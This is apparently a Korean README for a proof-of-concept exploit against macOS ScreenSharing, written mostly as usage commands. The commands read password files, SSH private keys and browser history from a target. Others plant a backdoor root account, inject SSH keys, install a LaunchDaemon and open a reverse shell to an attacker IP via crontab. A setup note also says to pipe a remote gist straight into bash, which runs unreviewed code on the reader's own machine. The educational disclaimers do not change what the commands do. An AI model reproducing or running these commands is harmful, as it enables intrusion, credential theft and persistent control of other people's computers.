
CVE-2026-65400에 대한 개념 증명(PoC) 익스플로잇으로, Apple ScreenSharing을 통해 macOS에서 인증된 파일 읽기/쓰기, 리버스 셸 및 지속성을 가능하게 합니다.
PayPal 또는 아래 QR 코드 스캔을 통해 이 프로젝트의 유지보수를 지원해 주세요.
이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요.
설정 예시:
git clone <repository-url>
cd <repository-name>
# 프로젝트는 python을 사용합니다. 아래를 따르세요.
# 가상 환경 생성
python -m venv venv
# 가상 환경 활성화
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# 의존성 설치
pip install -r requirements.txt
사용 예시:
# 대상에서 파일 읽기
# /etc/passwd를 읽고 표시
python3 exploit.py read -u root 192.168.1.100 /etc/passwd
# 읽고 로컬 파일로 저장
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt
# 사용자 파일 읽기
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt
# 대상에 파일 쓰기
# 로컬 파일을 대상에 쓰기
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt
# 특정 권한으로 쓰기 (crontab의 경우 0600)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600
# stdin에서 쓰기
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -
# 리버스 셸 얻기 (SIP 비활성화된 경우에만)
# 공격자 머신에서 다른 터미널로 리스너 시작
nc -nlvp 4444
# 익스플로잇 실행
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# 여기서:
# 192.168.1.100 = 대상 Mac IP
# 192.168.1.50 = 공격자 IP
# 4444 = 리버스 셸용 포트
# 예시 1: 시스템 파일 읽기
# shadow 파일 읽기 (접근 가능한 경우)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist
# Safari 기록 읽기
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db
# SSH 키 읽기 (존재하는 경우)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa
# 예시 2: 파일 쓰기
# 백도어 사용자 생성
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt
# SSH 키 주입
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub
# 시작 스크립트 작성
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist
# 예시 3: SIP 탐지
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# SIP가 활성화된 경우 출력:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead
# SIP가 비활성화된 경우 출력:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds
# 인증 우회 재시도
# 실패할 경우 재시도 횟수 증가
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50
# 포트 지정
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901
참고:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y를 실행해야 합니다.통제된 환경에서 사이버보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.
이 저장소는 교육 및 승인된 보안 연구용으로만 제공됩니다.
다음과 같은 내용을 학습하는 데 도움을 주기 위해 설계되었습니다.
이 저장소는 권한이 있는 환경에서만 사용하세요. 예:
승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.
저자와 기여자는 이 프로젝트로 인해 발생하는 어떠한 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.
이 저장소를 사용함으로써 다음 사항에 동의하게 됩니다.
이 프로젝트는 다음을 위해 만들어졌습니다.
책임 있는 공개(responsible disclosure) 관행을 따르고 모든 관련 법규를 준수하세요.
책임 있는 공개 또는 협업을 원하시면 GitHub를 통해 저장소 관리자에게 연락하세요.
승인된 보안 연구 및 교육을 위한 추가 CVE PoC 자료를 보려면 PoC CVE 컬렉션을 살펴보세요.